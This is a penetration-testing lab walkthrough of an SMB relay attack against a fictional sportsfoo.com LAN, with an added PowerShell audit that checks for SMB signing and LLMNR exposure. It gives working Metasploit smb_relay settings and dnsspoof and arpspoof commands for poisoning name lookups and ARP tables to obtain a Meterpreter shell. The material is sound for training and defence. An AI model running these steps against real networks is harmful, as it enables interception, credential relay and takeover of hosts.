Links:
https://medium.com/@AnisO./active-directory-attacks-smb-relay-attacks-ea7d8cf9a8f8
How the attack works:

Scenario:
You are hired by a small company to perform a security assessment. Your customer is sportsfoo.com, and they want your help testing the security of their environment according to the scope below. The assumptions of this security engagement are:
- You are going to do an internal penetration test, connected directly to their LAN network 172.16.5.0/24. The scope of this test is only the 172.16.5.0/24 segment.
- You are in a production network, so you must not lock any user account by guessing usernames and passwords.
The following image represents the LAB environment:

Scenario Goals:
- Exploitation using SMB Relay Attack
- Manipulating network traffic with dnsspoof
Scenario Tasks:
Launch an attack using the SMB Relay exploit so that once the Client (172.16.5.5) issues an SMB connection to any host in the *.sportsfoo.com domain, it is redirected to your Metasploit server, and you can then use its credentials to get a shell on the target machine (172.16.5.10).
This is a graphic that represents how this attack should work:

- The Client (Windows 7) issues an SMB connection to \\fileserver.sportsfoo.com\finance$ every 30 seconds or so.
- The attacker machine intercepts this request and spoofs the IP address of fileserver.sportsfoo.com.
- The Windows 7 system then issues the SMB connection to \\172.16.5.101 (the attacker machine) instead of the real IP of fileserver.sportsfoo.com.
- The SMB Relay exploit is already listening, receives the SMB connection, and relays the authentication to the target machine. The payload is a Windows Meterpreter shell.
- Once the exploit authenticates on the target machine, a reverse Meterpreter session is provided to the pentester.
Requirements:
- You must be on the same network as the victim(s). This means that if your attacking machine is in a different subnet/broadcast domain, you will be unable to capture the Net-NTLM hash.
- LLMNR must be enabled in the network (enabled by default).
- SMB Signing must be disabled or not required on the target machine. This is the default configuration for most Windows desktop operating systems; Windows Servers will usually have SMB Signing enabled and enforced by default.
- The Net-NTLM hash that you capture must belong to an elevated user on the target machine in order for you to get command execution.
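The requirements above are also the defender's checklist: a host that requires SMB signing cannot be used as a relay target, and a host with LLMNR disabled does not answer poisoned name lookups. The following PowerShell audit is an added example, not part of the original write-up; it assumes Windows 8 / Server 2012 or later (for the SmbShare cmdlets) and an elevated shell when run with -Fix.

```powershell
# Added audit script (not from the original write-up). Checks the host-side
# preconditions the relay depends on and optionally remediates them.
function Test-SmbRelayExposure {
    [CmdletBinding()]
    param([switch]$Fix)

    $findings = @()

    # Server side: if this host does not *require* signing, a relayed
    # authentication to it is accepted (the 172.16.5.10 role in the scenario).
    $srv = Get-SmbServerConfiguration
    if (-not $srv.RequireSecuritySignature) {
        $findings += 'SMB server signing not required (relay target exposure)'
        if ($Fix) { Set-SmbServerConfiguration -RequireSecuritySignature $true -Force }
    }

    # Client side: a client that does not require signing completes
    # authentication against a spoofed share such as \\172.16.5.101.
    $cli = Get-SmbClientConfiguration
    if (-not $cli.RequireSecuritySignature) {
        $findings += 'SMB client signing not required (victim exposure)'
        if ($Fix) { Set-SmbClientConfiguration -RequireSecuritySignature $true -Force }
    }

    # LLMNR: on unless the DNSClient policy value is explicitly 0.
    $llmnrKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
    $llmnr = (Get-ItemProperty -Path $llmnrKey -Name EnableMulticastNameResolution `
              -ErrorAction SilentlyContinue).EnableMulticastNameResolution
    if ($null -eq $llmnr -or $llmnr -ne 0) {
        $findings += 'LLMNR enabled (name-poisoning exposure)'
        if ($Fix) {
            New-Item -Path $llmnrKey -Force | Out-Null
            Set-ItemProperty -Path $llmnrKey -Name EnableMulticastNameResolution -Value 0 -Type DWord
        }
    }

    if ($findings.Count -eq 0) { 'No SMB relay preconditions found on this host.' } else { $findings }
}

Test-SmbRelayExposure   # audit only; add -Fix to enforce signing and disable LLMNR
```

Run it on both the client and the intended relay target; the relay in this lab only works while the target reports signing as not required.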
Implementation:
MSF Module:
exploit/windows/smb/smb_relay
Keep the default payload as is.
Use your attacking machine's IP as LHOST and SRVHOST.
Set SMBHOST to the target IP: set SMBHOST 172.16.5.10
**Now we want to configure DNS spoofing to redirect the victim to our Kali machine every time there is an SMB connection to any host in the domain sportsfoo.com.**
First, create a fake hosts-format file (here named dns):
echo "172.16.5.101 *.sportsfoo.com" > dns
This entry makes the victim believe that any subdomain of sportsfoo.com is reachable at 172.16.5.101, our attacking (MITM) IP.
Then spoof DNS with the fake hosts file we just created: -i selects the adapter in use, and -f points to the fake hosts file.
dnsspoof -i eth1 -f dns
MITM attack:
We want to spoof the ARP tables to make the Client (Win 7, 172.16.5.5) believe that we are the default gateway (172.16.5.1) or the TARGET, so that its traffic passes through us.
Now we want to enable IP Forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
Now we want to perform the ARP spoofing attack on both sides.
First on the Win7 device 172.16.5.5:
Specify the adapter in use, -t for the target (the Win 7 device), then the default gateway.
arpspoof -i eth1 -t 172.16.5.5 172.16.5.1
Second on the TARGET device 172.16.5.10:
Specify the adapter in use, -t for the target.
arpspoof -i eth1 -t 172.16.5.1 172.16.5.5
Before starting arpspoof, run the MSF exploit.

We can see here that someone accessed a file. INTERESTING!!!!
And if we look back into the MSF module:
